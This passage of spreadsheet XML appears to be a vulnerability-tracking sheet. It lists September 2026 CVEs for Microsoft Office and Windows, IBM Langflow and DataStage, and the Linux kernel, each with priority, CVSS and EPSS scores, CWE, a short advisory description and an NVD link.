          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="C371" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E371" s="5" t="inlineStr"/>
      <c r="F371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G371" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H371" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="C372" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E372" s="5" t="inlineStr"/>
      <c r="F372" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G372" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H372" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="C373" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E373" s="5" t="inlineStr"/>
      <c r="F373" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G373" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H373" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="C374" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E374" s="5" t="inlineStr"/>
      <c r="F374" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G374" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H374" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="C375" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E375" s="5" t="inlineStr"/>
      <c r="F375" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G375" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H375" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78569</t>
        </is>
      </c>
      <c r="C376" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E376" s="5" t="inlineStr"/>
      <c r="F376" s="5" t="inlineStr"/>
      <c r="G376" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to execute arbitrary code due to an incomplete denylist in the security scanner.</t>
        </is>
      </c>
      <c r="M376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78569</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78571</t>
        </is>
      </c>
      <c r="C377" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E377" s="5" t="inlineStr"/>
      <c r="F377" s="5" t="inlineStr"/>
      <c r="G377" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an unguarded eval() call on attacker-controlled input.</t>
        </is>
      </c>
      <c r="M377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78571</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78575</t>
        </is>
      </c>
      <c r="C378" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E378" s="5" t="inlineStr"/>
      <c r="F378" s="5" t="inlineStr"/>
      <c r="G378" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary commands due to improper validation of command-line arguments in the MCP stdio server configuration.</t>
        </is>
      </c>
      <c r="M378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78575</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79742</t>
        </is>
      </c>
      <c r="C379" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="inlineStr"/>
      <c r="G379" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an incomplete environment variable blocklist.</t>
        </is>
      </c>
      <c r="M379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79742</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="C380" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G380" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H380" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="C381" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G381" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H381" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="I381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="C382" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G382" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H382" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="C383" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G383" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H383" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="C384" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G384" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H38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84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80914</t>
        </is>
      </c>
      <c r="C385" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E385" s="5" t="inlineStr"/>
      <c r="F385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G385" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: ISO: fix use-after-free of listener socket in iso_conn_ready
iso_conn_ready() looks up the BIS listener socket with iso_get_sock(),
which takes a reference, and then, without re-checking its state,
creates a child socket from it:
    parent = iso_get_sock(hdev, ...);
    if (!parent)
        return;
    lock_sock(parent);
    sk = iso_sock_alloc(sock_net(parent), NULL, BTPROTO_ISO, ...);
    ...
    iso_chan_add(conn, sk, parent);
    ...
    release_sock(parent);
    sock_put(parent);
If the listener socket is closed concurrently, between iso_get_sock()
and lock_sock(), the reference taken by iso_get_sock() may be the last
one: the close path drops the link-list reference, and once
iso_conn_ready() drops its own reference at the end of the function the
socket is freed.  The child socket, however, is already linked to the
freed parent, and a later disconnect of the child runs iso_chan_del()
-&gt; bt_accept_unlink(), which dereferences the dangling parent pointer
into the freed accept queue (a use-after-free).  The same dangling
pointer is also dereferenced through parent-&gt;***() in
iso_chan_del().
Fix it the same way the connected (non-BIS) path was fixed in commit
0d255e63fcf3 ("Bluetooth: ISO: hold sk properly in iso_conn_ready"):
after taking the socket lock, re-check that the parent is still a
listening, alive socket, and bail out otherwise.</t>
        </is>
      </c>
      <c r="M385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80914</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80921</t>
        </is>
      </c>
      <c r="C386" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E386" s="5" t="inlineStr"/>
      <c r="F386" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G386" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: vsie: zero stale crypto bits
When shadowing crypto access bits from a format0 apcb (crycb 0 or 1),
the bits 64..255 are unchanged from whatever is in the vsie page in the
crycb and thus in the apcb. This gives a nested guest potential access
to a device no longer available. Zero out the remaining bits.</t>
        </is>
      </c>
      <c r="M386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80921</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81211</t>
        </is>
      </c>
      <c r="C387" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E387" s="5" t="inlineStr"/>
      <c r="F387" s="5" t="inlineStr"/>
      <c r="G387" s="5" t="inlineStr">
        <is>
          <t>ibm, python</t>
        </is>
      </c>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary Python code due to improper authorization of custom components in stored flows.</t>
        </is>
      </c>
      <c r="M387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81211</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="C388" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E388" s="5" t="inlineStr"/>
      <c r="F388" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G388" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="C389" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E389" s="5" t="inlineStr"/>
      <c r="F389" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G389" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H389" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81550</t>
        </is>
      </c>
      <c r="C390" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E390" s="5" t="inlineStr"/>
      <c r="F390" s="5" t="inlineStr"/>
      <c r="G390" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81550</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81551</t>
        </is>
      </c>
      <c r="C391" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E391" s="5" t="inlineStr"/>
      <c r="F391" s="5" t="inlineStr"/>
      <c r="G391" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to arbitrarily write to or delete files on shared storage due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81551</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81554</t>
        </is>
      </c>
      <c r="C392" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E392" s="5" t="inlineStr"/>
      <c r="F392" s="5" t="inlineStr"/>
      <c r="G392" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81554</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81940</t>
        </is>
      </c>
      <c r="C393" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
